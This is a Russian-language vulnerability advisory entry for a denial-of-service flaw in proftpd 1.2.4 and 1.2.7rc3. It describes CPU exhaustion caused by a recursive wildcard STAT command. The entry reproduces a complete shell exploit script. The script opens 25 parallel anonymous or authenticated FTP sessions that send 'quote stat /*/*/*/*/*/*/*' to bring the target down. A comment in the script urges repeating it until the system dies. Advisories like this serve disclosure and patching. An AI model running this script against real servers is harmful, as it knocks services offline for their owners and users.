Дата публикации: | 16.12.2002 |
Дата изменения: | 17.10.2006 |
Всего просмотров: | 1821 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | proftpd – ftp сервер для UNIX систем. Обнаруженная уязвимость позволяет пользователю, подключенному к серверу, заставить сервер потреблять 100% ресурсов CPU, что, в конечном счете, приводит к зависанию всей системы. Уязвимость обнаружена в proftpd 1.2.4 и 1.2.7rc3 Эксплоит: #!/bin/sh # # proftpd <=1.2.7rc3 DoS - Requires anonymous/ftp login at least # might work against many other FTP daemons # consumes nearly all memory and alot of CPU # tested against slackware 8.1 - proftpd 1.2.4 and 1.2.7rc3 # 7-dec-02 - detach - www.duho.org # use: ./prodos.sh <host> <user> <pass> # do this some more to make sure the system eventually dies cnt=25 while [ $cnt -gt 0 ] ; do ftp -n << EOF& o $1 quote user $2 quote pass $3 quote stat /*/*/*/*/*/*/* quit EOF let cnt=cnt-1 done sleep 2 killall -9 ftp echo DONE! #end |